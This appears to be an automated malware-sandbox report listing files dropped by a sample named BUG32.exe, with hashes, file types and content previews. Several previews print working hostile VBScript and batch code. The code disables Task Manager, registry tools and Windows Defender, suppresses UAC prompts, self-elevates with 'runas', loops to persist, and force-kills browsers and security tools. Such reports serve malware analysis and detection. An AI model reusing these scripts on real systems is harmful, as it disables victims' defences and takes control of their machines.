                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):182
                          Entropy (8bit):4.894015571157464
                          Encrypted:false
                          SSDEEP:3:WHiAHmOt8oQ/FERMQsmA6Es9ov6JC2xA8IlHHb4EHl37WIIXW3HypFRv:fG0tz6Es9UGMau5WIePrJ
                          MD5:052BC547687F4B9136A4D21CCB9BE339
                          SHA1:897DFC37A8D89C9FBE390F9663495A2940457100
                          SHA-256:2B1C03EC095BAA8004183D2D9DC2A42D012C22969EE9923215CF73982E4BB122
                          SHA-512:85E9A4092ED12D426FC5903C4F576B0085B3E794060382A87B8C8C871139A7968DD43B797088E303F4583374551102E4DC064B9B1E8AF4FE89AB20799A981A31
                          Malicious:false
                          Reputation:unknown
                          Preview:set objShell = createobject("Shell.Application")..dim buhu.. buhu="C:\bug32\jaq.vbs" .... ObjShell.ShellExecute "wscript.exe", """" & buhu & """ RunAsAdministrator", , "runas", 1 ..
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:MS Windows cursor resource - 1 icon, 32x32, hotspot @0x0
                          Category:dropped
                          Size (bytes):2238
                          Entropy (8bit):1.5350554441040605
                          Encrypted:false
                          SSDEEP:12:CWh5ekgF/eYspRLwXxlJpxvyXX4tykpl7lKslttaR04Otit6xl5:7zsp6zL0fvcX4tyUV3jtk0LtXl5
                          MD5:664A5626D7F9F5B991976B7C2FCD6176
                          SHA1:CAFDD6179DF723C7A7DCFA96A774FD2DC92EF40F
                          SHA-256:691BBBAD6B1D9B7C010CF63976E55E9C2B06EC0E9B29A7F16D8CF3B28E408CF8
                          SHA-512:D4F1EB1DAC1404219915F882AEAC2544F82465D8BF84D9AF0E03FA671A4F0798CA42FCD801CCE9715C05A06732A03EC31189943A4A001137F3A022A4B89991B7
                          Malicious:false
                          Reputation:unknown
                          Preview:...... ..............(... ...@...................................222.>>>...P...P..2P..Js.JJJ.VVV.bbb..b...z......H.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):29
                          Entropy (8bit):4.021268494903765
                          Encrypted:false
                          SSDEEP:3:+Y7w9yz:+Y7wO
                          MD5:9DBBDC7D01EA45C41F089D9C345B8100
                          SHA1:C0D429A5E3A6E729583E6BCF0599A62466CCFBE2
                          SHA-256:9A3CFE496CF2C6B1EFCBA29320353194B3974EBEB49CADCBF83A72745C50FEF6
                          SHA-512:530E8DBE050C7A073FF0EFBF6E117F6BF86AD856EC43B8A7FAEFC495F603503A6E18994D8CB778F66AD1077904F64C7189B5A2C10C8899EBB6DCAAF5C4F3461E
                          Malicious:false
                          Reputation:unknown
                          Preview:do..wscript.sleep 15000..loop
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 44100 Hz
                          Category:dropped
                          Size (bytes):1572944
                          Entropy (8bit):7.53763637867198
                          Encrypted:false
                          SSDEEP:49152:Vr2U5IahDUGN97rkqOAackLjQ0rZEAh3oW:NH2ahFNNrg3QbQoW
                          MD5:FAE94D96AC61B8D57365151E142ED9F4
                          SHA1:BF9B9BE54DCDADC9D8CDF427C16DC5CA9C8C28A8
                          SHA-256:86F9017CF6F3C95A43922E5E5C58D71CBC82064A78895B531D1F5AA368EA5B63
                          SHA-512:7B0D7026017DEA8AA70975C023160E340CAC7474BAE5BEEDFB906F7378D033BB67C44B1C7085AC34EF061008ECD0CF545449E1DA624C1408CDA1E649AB1CA49D
                          Malicious:false
                          Reputation:unknown
                          Preview:RIFFH...WAVEfmt ........D.............LIST....INFOISFT....Lavf55.19.100.data............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:MS Windows icon resource - 1 icon, 64x64, 32 bits/pixel
                          Category:dropped
                          Size (bytes):16958
                          Entropy (8bit):4.92784283329369
                          Encrypted:false
                          SSDEEP:192:rktjVwu4plNx2jO1pI9ZkzdXe51pN/uS/2qUC1osKnAysD51fk:AtjIplNx2jQcaJuDpNWS+qPKnG51fk
                          MD5:E22AB01202357460EEC9871C74E6212B
                          SHA1:D16C867A6A32769B1CDAB2CE2E37D4D7D48570B7
                          SHA-256:1BD0DBDBE78D8218968CF3D5F203ABF52824870A39610C505E8FBA695FD329BB
                          SHA-512:9535AD5C9D4B94EC525AB643E4F0FF37868465AE892F16C3465A5C0FC49A0BDB2075053BF1948502902E04996EF7DD3B8FA7DC6B9BE4CB756DDFBD76544EB507
                          Malicious:false
                          Reputation:unknown
                          Preview:......@@.... .(B......(...@......... ......@............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4102
                          Entropy (8bit):5.436945462499387
                          Encrypted:false
                          SSDEEP:96:3wzKdo+fVYlaqJEJo7FUdo+fVYlaqJEClc4:ZXScXClc4
                          MD5:E77AAD670E295B9849A0D3D4F8501EC2
                          SHA1:0F0061209C15A0184BACFE87FF67C80A7283DED5
                          SHA-256:C1FFAC115387D943660D11ACEA27A06A920F505A0F3142969C25C9FA2E830B6F
                          SHA-512:D2E9144A666600D407922A968CA8705F286D9B52FF43873A96A61FB39C63E11AD5D67E405CD5A95659D6309FC729B67269D19D405A9A2C9C8E18C2863515B760
                          Malicious:false
                          Reputation:unknown
                          Preview:set x = createobject("Wscript.shell")..set c = createobject("Scripting.FilesystemObject")..set objShell = createobject("Shell.Application")..on error resume next....'####################################################################..dim userad..userad=x.EXpandEnvironmentStrings("%USERNAME%")....if c.FileExists("C:\bug32\fst.msi") then..else..x.run "wmplayer.exe"..x.RegWrite"HKCU\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD","0","REG_DWORD"..x.RegWrite"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","1","REG_DWORD"..x.RegWrite"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools","1","REG_DWORD"..x.RegWrite"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys","1","REG_DWORD"..x.RegWrite"HKLM\Software\Policies\Microsoft\windows defender\disableantispyware","1","REG_DWORD"..x.RegWrite"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin","0","REG_DWORD"..x.
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):50
                          Entropy (8bit):4.358562939644916
                          Encrypted:false
                          SSDEEP:3:yGh/HyGch/HyCRen:ykyGyyCRe
                          MD5:FAF4749B646B63A1DF551FE0141727CB
                          SHA1:EAB00A1525581A6823D7216F3EC019012BAB619F
                          SHA-256:6B2831B0C5BCAC2F5F57AAB8028CD486F4C6C26364A70ECC76FF71D7F710049C
                          SHA-512:28EEA78034E7B6D09A32D9985D2731EC582C232425EE4D81A52D65AA5F3618F8D463C52CAA881496116C47433140E7B1C79DC6ADD6B88EF2650AC7AE8CBFB67A
                          Malicious:false
                          Reputation:unknown
                          Preview::A.."C:\BUG32\jsc.exe".."C:\BUG32\jsc.exe"..goto A
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):204800
                          Entropy (8bit):7.749648146387286
                          Encrypted:false
                          SSDEEP:3072:VUCDC6euEiNV49JNEgwXUx/ZF8xHozjfNLC6CzSpYCDCDCDCDCDCDCDCY:yKXRDgwiYyLYtLKKKKKKK
                          MD5:367B7179319F010F84B37ACFC65082BA
                          SHA1:3C74537066CC79CF1505E9C79FE321B53ED3AB16
                          SHA-256:035CC52A0ABB363A463E21787DC061A3B42376BA0B082BC9C2D7E2399365862F
                          SHA-512:D282FAC9692B3FF1AB838B1A9A30727F7E166F92923503C65BCA3BEF85E75B300A1973D6FC1739F04F4058E743ABDEC29A08ECF1BDA4730A02DCDAEB13749833
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.Y.........."...0..............4... ...@....@.. ....................................`..................................3..O....@.......................`......P3............................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................4......H........;.............. W..0..............................................(.... .....(.... ....(....(....&*...(.... .....(.... ....(....(....&*...(.... .....(.... ....(....(....&*.0..:.........o.........+#..o.....(.....r...pr'..p...(....&+...(.....*...0..{..........}......}......}......}.....s....}.....s....}......}.....(.......(...... .....(.......{....o....o.......{....o....( ....*..*...0............{....rC..po!.....{....o".....{....o#.....{.....($.....Xo%.....{.....(&....
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):398
                          Entropy (8bit):4.174042594897034
                          Encrypted:false
                          SSDEEP:12:nWcfWgbEnW+WpWYuAA7WPr/WYk/WuW4WaWymWZ7WrEJfmWmNv:n3fvyfMjul7Q/7k/5738m7SE9mRNv
                          MD5:9E116F6EB010B8BFF3211210E5B979FE
                          SHA1:D81B32E7845A614A38E3902239CE978C908AF8C2
                          SHA-256:CDEABD549E74E525E1BAAD3252246209667967399563F8BE2B3275C8C276FC3E
                          SHA-512:FD5687206D013577577D68C65215CD4636A616B83E12E5ACBAE0B619E543FF06F67D3881C8C85D0E6E0EE13DD7F5E20246B9EDAFEA26CB0D6BB39EE4362966B6
                          Malicious:false
                          Reputation:unknown
                          Preview:taskkill /f /im chrome.exe..taskkill /f /im opera.exe..taskkill /f /im iexplore.exe..taskkill /f /im msedge.exe..taskkill /f /im microsoftedge.exe..taskkill /f /im notepad.exe..taskkill /f /im firefox.exe..taskkill /f /im mspaint.exe..taskkill /f /im skype.exe..taskkill /f /im bing.exe..taskkill /f /im eset.exe..taskkill /f /im edge.exe..taskkill /f /im taskmgr.exe..taskkill /f /im regedit.exe..
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 44100 Hz
                          Category:dropped
                          Size (bytes):352880
                          Entropy (8bit):4.840131508665485
                          Encrypted:false
                          SSDEEP:6144:HABKuwDidKkReUkDJJrdimzgvFSVf6S5X03V4n8:sKuwDcKeeUkjUmaoVyUX0FQ8
                          MD5:77BB6C1E12D47EFF938D2EFB28E7FB9D
                          SHA1:7F4FC62FDE5EB3BEB6DEF399AB525380CC4B8965
                          SHA-256:926E24D85E847789A62F8AE3DAE7AF494FF329893A9A3C133B073B4B9CDDBCCB
                          SHA-512:A19AFAA90822B0081D51612AEA2A41992F5C4EB2F39767CF9ED96B1FFC88BBB4203B4A04E9942C2CEF445866817F56802EF099BA4F034949861DD3DA6C4B3B2F
                          Malicious:false
                          Reputation:unknown
                          Preview:RIFFhb..WAVEfmt ........D.............LIST....INFOISFT....Lavf55.19.100.data b.......................................... ...........................$...............&.................................................................................................................................................................................................................................................................................................!.-...............$..."...................................'............... ...........6...............#...........................................................................................................#...............?....................................................... ...........O.-.H...........+.".........................7.........$.....J...............$.........`.J...!.....P.....g.............".............0.u...........?.(.........0.&...............+.(...............2.....'.....................4.!...................U.+.....
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):81
                          Entropy (8bit):4.888629323605183
                          Encrypted:false
                          SSDEEP:3:kWAIyGuIVCgBBYSLNLTARen:fAIyxI7OSJnARe
                          MD5:00CF4877A187A307971F4FD650AC8C11
                          SHA1:2569ED07CBE4AB78D12CBA571E83E1E1A7FC59B6
                          SHA-256:8FDD9F0AA62B3E365850970187311192F5E101768EDAD88B550CC39A6909BDCE
                          SHA-512:039E90E66ED5FA8CD39A7525D1B7B0EBA85B32D4954A41E60A113B61D3E1FDA9B2356975A587873CA54CEF129A894AC19E2D1C6D59E20A182412861B1205D4B9
                          Malicious:false
                          Reputation:unknown
                          Preview::A..wscript.exe "C:\BUG32\emptyone.vbs"..wscript.exe "C:\bug32\admin.vbs"..goto A
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):277
                          Entropy (8bit):5.075742538505295
                          Encrypted:false
                          SSDEEP:6:fG0tz6Es9BFLNdMoPcu0LuGMau5WIePrJ:fKDdpUWxan9zJ
                          MD5:FE18D2D82DBFB9226CC424C0164252BE
                          SHA1:E058B9EFF08E3A7370D49D78634C8C201DB8F0E5
                          SHA-256:7922E452D5166BFA8E32E9392CB3B123CFFC54B03218D8FCB584F5A2D97A0B96
                          SHA-512:6540372F658F6397EB836D979B4208C6507B4AAFDB8EACCE772D645CDC1F418690E50C275C0A71C305F0A9201688BBE955FB5023AFF223F18C0E83E32735C996
                          Malicious:false
                          Reputation:unknown
                          Preview:set objShell = createobject("Shell.Application")..dim buhu.. buhu="C:\bug32\jaq.vbs" ..set x = createobject("Wscript.shell")..x.run "C:\BUG32\js.bat",0..x.run "C:\BUG32\nokill.bat",0.. ObjShell.ShellExecute "wscript.exe", """" & buhu & """ RunAsAdministrator", , "runas", 1 ..
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 44100 Hz
                          Category:dropped
                          Size (bytes):901200
                          Entropy (8bit):7.003112173936088
                          Encrypted:false
                          SSDEEP:24576:qk5l4ageFsL89yoRi1D+wUJA0YKv10OJ4UG:qk0aCLkfAZKt0OJT
                          MD5:95AA92415C37BBF7E649D406F159853D
                          SHA1:FF37BC8B297A81E78D31E27559A9C4E1E1307275
                          SHA-256:B9D6D86686222ADDC0048BDB7BE1E5531A1D4B48D8D65E156E180E94035C3D02
                          SHA-512:6EFA300352E64DA46D343DAD5EF2D810C7EE0B07DC9B7B1B8968EF9C8A4446ED4A17064194DFC44FBE16C95972E4866EB1042E34A2528B782F0BA0EE582FAFED
                          Malicious:false
                          Reputation:unknown
                          Preview:RIFFH...WAVEfmt ........D.............LIST....INFOISFT....Lavf55.19.100.data............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:PNG image data, 1366 x 768, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):53478
                          Entropy (8bit):7.826606752307044
                          Encrypted:false
                          SSDEEP:1536:4TRt50i/bemkC9EqIrmljVF5BE8F88EwQngGYYLPniT:4v5/SHWE9iljVFnrK8EwQnJtLQ
                          MD5:19D522CD15CC73B932F1AB4252D9D624
                          SHA1:27C0F04A38AF403F84E1F2DC6965206E8B3F9B73
                          SHA-256:78C21952F543624FE51F92BC2F35B17F652E4FED695228AA530370FF05083A04
                          SHA-512:8C43E39A8AFFC34743B4E1521F85F578EA2B3B6F455D20983746EC4EB1F28F6F706889BA3ED1551B9A14AB3DC9723E719A48077DE9FBD06DD77EE0F41B064A9C
                          Malicious:false
                          Reputation:unknown
                          Preview:.PNG........IHDR...V.........@\......sRGB.........gAMA......a.....pHYs..........o.d...{IDATx^......y...M...{U...{.....u$.H ..D...QD....n.......N..8.Ir.?..=.{..g.]-;....}...V...+.ovf,..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1.>O}P^..b.1..c.......;..c.1..c.#....K...c.1..c..$s......_..e.1..c.1...)........}..c.1..c....y...}....}.a.1..c.1...5.....e.1..c.1.X..i.+...c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.......+..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1...o6..c.1..c.1..c.1..c.1..c.1..js...v..]..R.~r.vp,.sA.I..c.1..c:5...@.L]k.N..O+u..>].I....$c.1..c.1....O..i...C.......H...}.
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):513
                          Entropy (8bit):5.283297347715357
                          Encrypted:false
                          SSDEEP:12:NdpPg/SYtYnXAf2GEs7wnyzK7wCrVjhRWiEvUMnnF:HlgKmYQfNEsEdzrV1dEcMF
                          MD5:739EFD2B7B9737D3D191E9FC5B983824
                          SHA1:6AD90C8406AE243FBB5CE07172447879205B525C
                          SHA-256:1B51EF43C6E66683199C084B53B5B13D39A02EA6A94CA5F7293C7D68BA362583
                          SHA-512:7FA6EAD55103CCF506192643CE608B84969A8BDA28C7BC2855907D14B6E756574258924766920EA661D68507FCA772A12A652AAB7C85466E0D97A444098CF59C
                          Malicious:true
                          Reputation:unknown
                          Preview:set x = createobject("Wscript.shell")..set c = createobject("Scripting.FilesystemObject")..set objShell = createobject("Shell.Application")..on error resume next....if c.FolderExists("C:\BUG32") then..msgbox"Access denied!",1+16,"ERROR"..else..c.CreateFolder"C:\BUG32"..wscript.sleep 1000..c.CopyFolder"BUG32", "C:\BUG32"..wscript.sleep 200..x.regWrite"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Consentpromptbehavioradmin","0","REG_DWORD"....x.run "wscript.exe ""C:\BUG32\admin.vbs"""..end if
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
